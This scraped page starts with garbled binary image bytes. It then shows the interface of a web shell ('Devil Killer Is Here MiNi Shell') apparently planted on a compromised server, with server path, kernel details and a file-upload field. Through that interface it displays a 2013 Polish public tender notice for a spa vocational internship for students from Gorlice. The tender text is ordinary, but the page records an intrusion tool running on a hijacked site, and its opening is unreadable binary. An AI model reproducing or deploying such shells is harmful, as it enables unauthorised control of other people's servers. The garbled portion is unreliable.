JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130919/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130919/381566-N-2013.html

<p class="kh_header"><b>Kraków: Zakup usług organizacji i przeprowadzenia stażu - wizyty zawodoznawczej w Ośrodku SPA ramach realizacji projektu pn. Modernizacja kształcenia zawodowego       w Małopolsce</b><br>
<b>Numer ogłoszenia: 381566 - 2013; data zamieszczenia: 19.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie , os. Teatralne 4a, 31-945 Kraków, woj. małopolskie, tel. 12 644 28 72; 12 644 28 71, faks 12 644 99 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zjewm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna województwa małopolskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług organizacji i przeprowadzenia stażu - wizyty zawodoznawczej w Ośrodku SPA ramach realizacji projektu pn. Modernizacja kształcenia zawodowego       w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/. Przedmiotem niniejszego postępowania jest zorganizowanie                          i przeprowadzenie stażu-wizyty zawodoznawczej dla 12 uczniów                      i uczennic Zespołu Jednostek Edukacyjnych Województwa Małopolskiego w Gorlicach - Szkoła Policealna Pracowników Służb Medycznych  i Społecznych w Gorlicach, w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 

2/. Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:

W ramach realizacji przedmiotu zamówienia do obowiązków Wykonawcy należy zapewnienie transportu, noclegów, wyżywienia oraz zorganizowanie stażu-wizyty zawodoznawczej według programu określonego przez Zamawiającego.

3/. Wykonawca zobowiązany jest zapewnić na własny koszt wszystkie elementy związane z realizacją zamówienia, to jest w szczególności:
a.	pokryć koszty stażu-wizyty zawodoznawczej w przypadku pobierania opłat przez Ośrodek,
b.	zapewnić realizację stażu - wizyty zawodoznawczej przez wykwalifikowaną osobę, posiadającą doświadczenie zawodowe i wiedzę merytoryczną z tematu objętego przedmiotem zamówienia, odpowiedzialną za prawidłowy przebieg stażu-wizyty zawodoznawczej,
c.	zapewnić dostęp do gabinetów i sprzętu, będącego wyposażeniem Ośrodka SPA,
d.	zapewnić wszystkim uczestnikom stażu-wizyty zawodoznawczej wyżywienie, nocleg oraz transport na miejsce stażu i powrót,
e.	ubezpieczyć uczestników stażu-wizyty zawodoznawczej od NNW na czas transportu i pobytu w ośrodku,
f.	dostarczyć materiały szkoleniowe na własność dla każdego uczestnika stażu (w formie kserokopii lub broszur tematycznych, teczki).

4/. Ramowy program stażu-wizyty zawodoznawczej:  program obejmuje 16 godzin zajęć praktycznych,  przy czym przez 1 godzinę trwania stażu-wizyty zawodoznawczej Zamawiający rozumie godzinę zegarową 60 minut.
W trakcie trwania stażu, w każdym dniu przewiduje się jedną przerwę obiadową trwającą 45 minut. 

5/. Minimalna tematyka stażu-wizyty zawodoznawczej musi obejmować niżej wymienione zagadnienia:
a.	zapoznanie się ze strukturą organizacyjną SPA, jej działaniem na rynku lokalnym, reklamą, organizacją pracy,
b.	poznanie oferty SPA: rodzajów usług, wyposażenia, nowoczesnych rozwiązań organizacji obsługi klienta,
c.	poznanie najbardziej popularnych i lubianych masaży,
d.	peelingi przygotowujące do zabiegów,  rodzaje peelingów i ich działanie na skórę.
e.	nabycie umiejętności masażu twarzy anty-aging,
f.	zapoznanie z masażem orientalnym i nabycie umiejętności jego wykonania,
g.	rozmowa z działem kadr na temat oczekiwań przyszłych pracodawców wobec kandydatów na pracowników gabinetów SPA.

6/. Czas trwania stażu-wizyty zawodoznawczej: 
Łącznie 32 godziny: po 16 godzin dla jednej edycji- 6 osobowej grupy. Zajęcia muszą być prowadzone w weekend (sobota, niedziela). 

7/.Liczba uczestników stażu - wizyty zawodoznawczej: 
łącznie: 12 osób, w dwóch edycjach po 6 uczniów (edycja I: 16 godzin- 6 osób, edycja II: 16 godzin- 6 osób).
Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.

8/. Czas realizacji: październik 2013 roku - 17 listopad 2013 roku. 
Staż - wizyta zawodoznawcza musi zostać zorganizowana 
w weekend.

9/.Miejsce realizacji stażu - wizyty zawodoznawczej: Ośrodek SPA w miejscowości uzdrowiskowej wyposażony w  saunę, salę gimnastyczną, gabinety masażu posiadające odpowiedni sprzęt i środki, zlokalizowany w odległości do 65 km dojazdu od siedziby szkoły.

Szczegółowy harmonogram realizacji przedmiotu zamówienia dla tej części zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - Liderem Szkolnym po podpisaniu umowy. 

10/. Obowiązki Wykonawcy:
W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a. oznakowania sal, w których będzie odbywał się staż-wizyta zawodoznawcza, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.informowania uczestników stażu-wizyty zawodoznawczej o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c. stosowania na wszystkich dokumentach znaków zgodnie 
z wytycznymi POKL,
d.	odpowiedniego oznakowania pojazdu zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.
Zamawiający po zakończeniu  stażu - wizyty zawodoznawczej przeprowadzi jego ewaluację za pomocą anonimowych ankiet ewaluacyjnych.

11/.Wykonawca po zakończeniu  stażu - wizyty zawodoznawczej  przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a.listę obecności z własnoręcznymi podpisami uczestników  stażu - wizyty zawodoznawczej  w każdym dniu odbywania stażu,
b.	program  stażu - wizyty zawodoznawczej  oraz dziennik zajęć,
c.	potwierdzenia odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów,
d.	listy odbioru posiłków oraz noclegów (z każdego dnia), potwierdzonych własnoręcznym podpisem ucznia,
e.	kopię wydanych certyfikatów/zaświadczeń oraz listę potwierdzającą ich odbiór przez uczestników,
f.	informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem.

12/. Szczegółowe wymagania dotyczące zakwaterowania:
Wykonawca zapewni zakwaterowanie grupy, w miejscowości uzdrowiskowej, w miejscu odbywania stażu-wizyty zawodoznawczej lub w miejscu zlokalizowanym nie dalej niż 1 km od tego miejsca, 
w budynku stacjonarnym, spełniającym m.in. następujące wymagania:
- stołówka mieszcząca się w budynku zakwaterowania, bądź nie dalej niż 100 m od niego,
- pokoje 1,2 lub 3 osobowe z samodzielnym węzłem higieniczno-sanitarnym.
Wyposażenie łazienki: wanna z baterią i natryskiem lub kabina natryskowa, umywalka z blatem lub półka, wc, lustro, gniazdko elektryczne, pojemnik na śmieci, brak ograniczeń w korzystaniu                           z ciepłej wody.
Minimalne wyposażenie pokoi: łóżka (w ilości odpowiadającej nazwie pokoju), pościel, nocny stolik lub półka przy każdym miejscu do spania, szafa lub zabudowana wnęka garderobiana, stół/biurko, krzesło lub inny mebel do siedzenia, wieszak, telewizor, oświetlenie.
Obiekt nowoczesny, czysty, wyposażony w sprawne urządzenia sanitarne i techniczne.
Standard typowy obiektom dwugwiazdkowym.

13/. Szczegółowe wymagania związane z wyżywieniem:
Do obowiązków Wykonawcy należy zapewnienie uczestnikom stażu- wizyty zawodoznawczej wyżywienia: 1 śniadanie, 2 obiady i 1 kolacja przez 2 dni trwania stażu dla każdego uczestnika. Dla każdej edycji należy zapewnić: 6 śniadań (niedziela), 12 obiadów (sobota, niedziela), 6 kolacji (sobota). 


Wyżywienie: 
a.śniadanie - pieczywo różnorodne, danie na ciepło: jajecznica lub kiełbaski na gorąco lub wędliny, ser żółty, dżem, świeże warzywa: pomidor, ogórek zielony, napoje: kawa, herbata, dodatki: cytryna, mleko, masło,
b.	obiad - zupa, danie główne (mięsne z dodatkiem ziemniaków lub ryżu i zestawu surówek), napoje: kompot lub soki owocowe,
c.	kolacja - pieczywo różnorodne, wędliny, ser, świeże warzywa: pomidor, ogórek zielony, napoje: herbata, dodatki: cytryna, mleko, masło, woda mineralna gazowana lub niegazowana (0,33l/osobę).

14/.Transport
Wykonawca zapewni transport uczestników z Gorlic do miejsca realizacji stażu - wizyty zawodoznawczej  i z powrotem według planu:
1.	Wyjazd o godzinie 5:30 z Gorlic - Szkoła Policealna Pracowników Służb Medycznych i Społecznych w Gorlicach
2.	Przyjazd do Ośrodku SPA (miejsce zakwaterowania) ok. godz. 7.00
3.	Zakwaterowanie  godz. 7.15
4.	Przejazd do miejsca realizacji stażu-wizyty zawodoznawczej godz. 7.45
5.	Odbycie stażu-wizyty zawodoznawczej - 8 godzin: 
a.	Godzina rozpoczęcia: 8.00
b.	Godzina zakończenia: 16.45
c.	Obiad w przerwie ok. godz. 13.00
6.	Powrót do miejsca zakwaterowania ok. godz. 17.00
7.	Kolacja ok. godz. 18.00
8.	Nocleg
II dzień
1.	Śniadanie godz. 7.15
2.	Przejazd do miejsca realizacji stażu-wizyty zawodoznawczej godz. 7.45
3.	Odbycie stażu-wizyty zawodoznawczej - 8 godzin:
a.	Godzina rozpoczęcia: 8.00
b.	Godzina zakończenia:16.45
c.	Obiad w przerwie ok. godz. 13.00
4.	Powrót do miejsca zakwaterowania ok. godz.17.00
5.	Wykwaterowanie i wyjazd do Gorlic ok. godz. 18.00
6.	Powrót do Gorlic ok. godz. 19.30

Wykonawca zapewni: przewóz  (autokarem lub busem) uczniów zgodnie z obowiązującymi w zakresie przewozu osób przepisami prawa, pojazdami spełniającymi wymagania techniczne określone z przepisach ustawy - Prawo o ruchu drogowym i innych przepisach związanych z przewozem osób, aktualne badania techniczne pojazdu, którym będą podróżować uczestnicy, aktualną licencję na wykonywanie krajowego transportu drogowego osób - dla przewoźnika, odpowiednie kwalifikacje zawodowe kierowców, ubezpieczenie. W przypadku awarii środka transportu Wykonawca zapewni na własny koszt zastępczy środek transportu, spełniający warunki określone w SIWZ i umowie, w taki sposób aby nie powodować opóźnień czasowych. Zamawiający  nie będzie ponosił z tego tytułu żadnych dodatkowych kosztów. W przypadku, gdy Wykonawca nie  zapewni zastępczego środka transportu oraz kierowców w sytuacji powyżej określonej Zamawiający zleci osobie trzeciej wykonanie zastępczej usługi. Wykonawca ponosi koszty zapewnienia zastępczego środka transportu.
Wykonawca pokrywa wszystkie wymagane opłaty drogowe 
i parkingowe.

15/. Szczegółowe wymagania dotyczące ubezpieczenia:
Wykonawca zapewni ubezpieczenie NNW  do wysokości nie mniejszej niż 10 000 PLN  na czas transportu i pobytu dla każdego uczestnika stażu - wizyty zawodoznawczej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.27.00.00-3, 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania odpowiednim osobami
zdolnymi do wykonania zamówienia Zamawiający uzna Wykonawców, którzy dysponują co najmniej jedną osobą, posiadającą minimum wykształcenie średnie i co najmniej 2 letnie doświadczenie zawodowe w dziedzinie masażu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- szczegółowy opis ośrodka, w którym zostaną zakwaterowani uczestnicy stażu-wizyty zawodoznawczej. Wskazane jest, aby opis uzupełniony był zdjęciami, folderami, prospektami obrazującymi zawarte w opisie szczegółowe dane placówek.
- opis świadczeń (menu) dla uczestnika,
-  szczegółowy program stażu- wizyty zawodoznawczej</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jego reprezentacji we właściwym rejestrze lub w Centralnej Ewidencji i Informacji o Działalności Gospodarczej. 2/. Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy
SEKCJA IV: PROCEDURA</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zjewm.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 102a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2013 godzina 12:00, miejsce: Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 213.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego za pośrednictwem Programu Operacyjnego Kapitał Ludzki, działanie 9.2; Projekt Systemowy Województwa Małopolskiego Modernizacja Kształcenia Zawodowego w Małopolsce.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com